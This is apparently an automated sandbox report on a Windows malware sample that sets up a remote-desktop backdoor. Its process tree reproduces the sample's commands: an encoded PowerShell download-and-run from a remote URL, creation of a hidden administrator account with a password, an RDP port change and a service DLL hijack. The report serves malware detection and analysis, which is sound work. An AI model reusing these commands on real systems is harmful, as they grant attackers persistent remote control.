Overview

overview

10

Static

static

f3de668061...42.exe

windows7_x64

10

f3de668061...42.exe

windows10_x64

10

Analysis

  • max time kernel
    77s
  • max time network
    139s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    11-11-2020 11:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe

  • Size

    3.4MB

  • MD5

    09fd827d8b404557a5c9e06810247c12

  • SHA1

    592cec34a644689ea9337a1da194707f795adc14

  • SHA256

    f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342

  • SHA512

    6808ccdda230ad235cd6322c264c834783febd71a6f658f7d81df30c1689bf10c0b305978f65d1c4c572d0afce2b811b32494ed3f3f476e97ffc923c5c18060a

Score
10/10
persistenceupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blacklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies service 2 TTPs 2 IoCs
    persistence
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 217 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 77 IoCs
  • Suspicious use of WriteProcessMemory 68 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe
    "C:\Users\Admin\AppData\Local\Temp\f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3976
    • \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Deletes itself
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:188
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zoqd1035\zoqd1035.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3436
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4ED1.tmp" "c:\Users\Admin\AppData\Local\Temp\zoqd1035\CSC463BC4AF188A4A8598802B9627B669C5.TMP"
          4⤵
            PID:744
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:2468
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies service
            • Modifies registry key
            PID:2740
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:2748
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1144
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1232
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2308
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1608
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3356
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:4092
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4048
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1404
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:744
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:740
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:4016
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:2664
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user updwin Ghasar4f5 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1624
                    • C:\Windows\system32\net.exe
                      net.exe user updwin Ghasar4f5 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3252
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user updwin Ghasar4f5 /del
                        3⤵
                          PID:3268
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user updwin mHhAj97g /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3568
                      • C:\Windows\system32\net.exe
                        net.exe user updwin mHhAj97g /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2168
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user updwin mHhAj97g /add
                          3⤵
                            PID:2156
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2736
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:8
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
                            3⤵
                              PID:2420
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1336
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4092
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
                              3⤵
                                PID:2580
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2308
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" updwin /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2372
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
                                3⤵
                                  PID:1720
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user updwin mHhAj97g
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3808
                              • C:\Windows\system32\net.exe
                                net.exe user updwin mHhAj97g
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:636
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user updwin mHhAj97g
                                  3⤵
                                    PID:640
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2168
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                    PID:1232
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C wmic CPU get NAME
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2468
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic CPU get NAME
                                    2⤵
                                      PID:2888
                                  • C:\Windows\System32\cmd.exe
                                    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                    1⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2580
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      2⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:3012
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                        3⤵
                                        • Blacklisted process makes network request
                                        • Drops file in Program Files directory
                                        • Drops file in Windows directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1620

                                  Network

                                  MITRE ATT&CK Matrix ATT&CK v6

                                  Initial Access

                                  Execution

                                  Persistence

                                  Account Manipulation

                                  1
                                  T1098

                                  Registry Run Keys / Startup Folder

                                  1
                                  T1060

                                  Modify Existing Service

                                  1
                                  T1031

                                  Privilege Escalation

                                  Defense Evasion

                                  Modify Registry

                                  3
                                  T1112

                                  Credential Access

                                  Discovery

                                  Lateral Movement

                                  Remote Desktop Protocol

                                  1
                                  T1076

                                  Collection

                                  Exfiltration

                                  Command and Control

                                  Impact

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Temp\RES4ED1.tmp
                                    MD5

                                    a678d614e8a35e764b9050bb314ff4f7

                                    SHA1

                                    c3285eb467f7d1188044ea6166f4fc92a73fc5c7

                                    SHA256

                                    1b2e81088a1fa8c8384db05a322fbb1b32b51f6e9f6fa59d1b744439ca9d5717

                                    SHA512

                                    b667bb3f137c54dfab58797e1b4e07cb41ad117336ac114aaaea602a58a337cb7ccf483be57fedd30265570d68739ed64c021c312d7839f53699d1f5eac3927c

                                    Download Submit
                                  • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
                                    MD5

                                    dac6b25db50155c0c78d5bf64fb95fa3

                                    SHA1

                                    9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d

                                    SHA256

                                    6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf

                                    SHA512

                                    679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868

                                    Download Submit
                                  • C:\Users\Admin\AppData\Local\Temp\get-points.zip
                                    MD5

                                    7cac19b2868c41555db4b71219217f9b

                                    SHA1

                                    d6f77db578db3c5c572c3a944d9072ed00560dcb

                                    SHA256

                                    d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a

                                    SHA512

                                    5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6

                                    Download Submit
                                  • C:\Users\Admin\AppData\Local\Temp\zoqd1035\zoqd1035.dll
                                    MD5

                                    0373a86ee50979377275156371cda297

                                    SHA1

                                    78b2e581b894563fc24da96ecfc2650209852fe5

                                    SHA256

                                    a4d90d6df58daf948a813c582dd6de992de071485c8598ae83b08695be0d53dd

                                    SHA512

                                    a8d8df43e1aa2cc2256a86e4dce4f3c31f99e27e0539ae39e7845a7a549a463ec3da8106810d6617f53f7c69118f7748e80578663bdc106fab5ab1168a13c9a5

                                    Download Submit
                                  • \??\c:\Users\Admin\AppData\Local\Temp\zoqd1035\CSC463BC4AF188A4A8598802B9627B669C5.TMP
                                    MD5

                                    6c71aa2e00db33fe8c1cacff02e50b0d

                                    SHA1

                                    4cf11d0cae604e7536c5060e6e2ddcbb9b3dfb54

                                    SHA256

                                    0d674155969fd764d7cee7518f4557b117a9b34dd8dfb8c9ec805c8a09d6ca88

                                    SHA512

                                    4f959f55fec51e70b42a190fb0f79cbc8d75c82b92dad601bcdf64b1760de07d0e0ebf01cd3307328042dabbc348c3cdac2fe6c48ef623810fdce8afcfd2fef9

                                    Download Submit
                                  • \??\c:\Users\Admin\AppData\Local\Temp\zoqd1035\zoqd1035.0.cs
                                    MD5

                                    6f235215132cdebacd0f793fe970d0e3

                                    SHA1

                                    2841e44c387ed3b6f293611992f1508fe9b55b89

                                    SHA256

                                    ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

                                    SHA512

                                    a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

                                    Download Submit
                                  • \??\c:\Users\Admin\AppData\Local\Temp\zoqd1035\zoqd1035.cmdline
                                    MD5

                                    b95881e6e1ed57c9e246c8d237110709

                                    SHA1

                                    984310433e7e47e46033da9651c151a861965004

                                    SHA256

                                    bced04afdb7587f18265b97a96ff1e9a7500ff2d2a50fbf51f7c9d26583f51cb

                                    SHA512

                                    0598e898049c735e9c9f8a6c865b0389bdd1a3e00a39f5dba0f16b0a18901aa9b29032cbd84248fc04bf096f1ae2064c2a85331119336c16c1d753e52a30042d

                                    Download Submit
                                  • \Windows\Branding\mediasrv.png
                                    MD5

                                    eeb448ea2709c57b9ea2e223d0c79396

                                    SHA1

                                    38331dd027386151ee37a29a7820570a76427b02

                                    SHA256

                                    c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272

                                    SHA512

                                    c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc

                                    Download Submit
                                  • \Windows\Branding\mediasvc.png
                                    MD5

                                    bb873bd05a47f502ee4ed3c4ea749a4f

                                    SHA1

                                    e55a6bf49a4833fb9e9b123df39dac9bf507f75a

                                    SHA256

                                    a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a

                                    SHA512

                                    ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548

                                    Download Submit
                                  • memory/8-34-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/188-4-0x00000289D15E0000-0x00000289D15E1000-memory.dmp
                                    Filesize

                                    4KB

                                    Download
                                  • memory/188-5-0x00000289D1790000-0x00000289D1791000-memory.dmp
                                    Filesize

                                    4KB

                                    Download
                                  • memory/188-3-0x00007FFCA0770000-0x00007FFCA115C000-memory.dmp
                                    Filesize

                                    9.9MB

                                    Download
                                  • memory/188-2-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/188-14-0x00000289D1730000-0x00000289D1731000-memory.dmp
                                    Filesize

                                    4KB

                                    Download
                                  • memory/636-40-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/640-41-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/740-27-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/744-10-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/744-26-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1144-18-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1232-19-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1232-42-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1404-25-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1608-21-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1620-46-0x00007FFCA0770000-0x00007FFCA115C000-memory.dmp
                                    Filesize

                                    9.9MB

                                    Download
                                  • memory/1620-45-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/1720-39-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2156-33-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2168-32-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2308-20-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2372-38-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2420-35-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2468-15-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2580-37-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2664-51-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2740-16-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2748-17-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/2888-43-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3012-44-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3252-30-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3268-31-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3356-22-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3436-7-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/3976-1-0x00000000018D0000-0x00000000018D1000-memory.dmp
                                    Filesize

                                    4KB

                                    Download
                                  • memory/4016-50-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4048-24-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4092-36-0x0000000000000000-mapping.dmp
                                    Download
                                  • memory/4092-23-0x0000000000000000-mapping.dmp
                                    Download